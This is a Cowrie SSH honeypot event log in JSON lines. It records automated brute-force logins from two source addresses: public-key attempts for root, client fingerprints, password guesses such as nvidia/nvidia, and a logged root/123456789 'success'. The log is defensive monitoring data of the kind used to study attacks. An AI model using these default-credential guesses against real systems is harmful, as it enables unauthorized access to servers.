{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:14.677130Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:14.677873Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-08-31T07:01:15.039656Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:15.040397Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:15.401569Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49876,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe6e6e0add02","protocol":"ssh","message":"New connection: 212.227.235.229:49876 (1.2.3.4:22) [session: fe6e6e0add02]","sensor":"my-vps","timestamp":"2025-08-31T07:01:15.757141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:15.758492Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:16.115394Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:16.830935Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:16.831561Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","sensor":"my-vps","timestamp":"2025-08-31T07:01:17.189579Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:17.190190Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:17.567677Z","src_ip":"212.227.235.229","session":"fe6e6e0add02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49886,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e365dc2e303","protocol":"ssh","message":"New connection: 212.227.235.229:49886 (1.2.3.4:22) [session: 6e365dc2e303]","sensor":"my-vps","timestamp":"2025-08-31T07:01:17.915628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:17.916361Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:18.266192Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:18.967605Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:18.968246Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","sensor":"my-vps","timestamp":"2025-08-31T07:01:19.318952Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:19.319634Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:19.673833Z","src_ip":"212.227.235.229","session":"6e365dc2e303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49150,"dst_ip":"1.2.3.4","dst_port":22,"session":"a911fa94abed","protocol":"ssh","message":"New connection: 212.227.125.160:49150 (1.2.3.4:22) [session: a911fa94abed]","sensor":"my-vps","timestamp":"2025-08-31T07:01:21.734295Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55412,"dst_ip":"1.2.3.4","dst_port":22,"session":"644fa6c125e3","protocol":"ssh","message":"New connection: 212.227.125.160:55412 (1.2.3.4:22) [session: 644fa6c125e3]","sensor":"my-vps","timestamp":"2025-08-31T07:01:23.587865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:01:24.009523Z","src_ip":"212.227.125.160","session":"644fa6c125e3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:01:24.010165Z","src_ip":"212.227.125.160","session":"644fa6c125e3"}
{"eventid":"cowrie.login.failed","username":"www","password":"1234567","message":"login attempt [www/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:26.199301Z","src_ip":"212.227.125.160","session":"644fa6c125e3"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:26.620381Z","src_ip":"212.227.235.229","session":"ed4b62583a02"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:27.735115Z","src_ip":"212.227.125.160","session":"644fa6c125e3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:01:28.622375Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:01:28.723413Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
{"eventid":"cowrie.session.closed","duration":"58.8","message":"Connection lost after 58.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:34.996640Z","src_ip":"212.227.235.229","session":"ed4b62583a02"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:01:48.983993Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
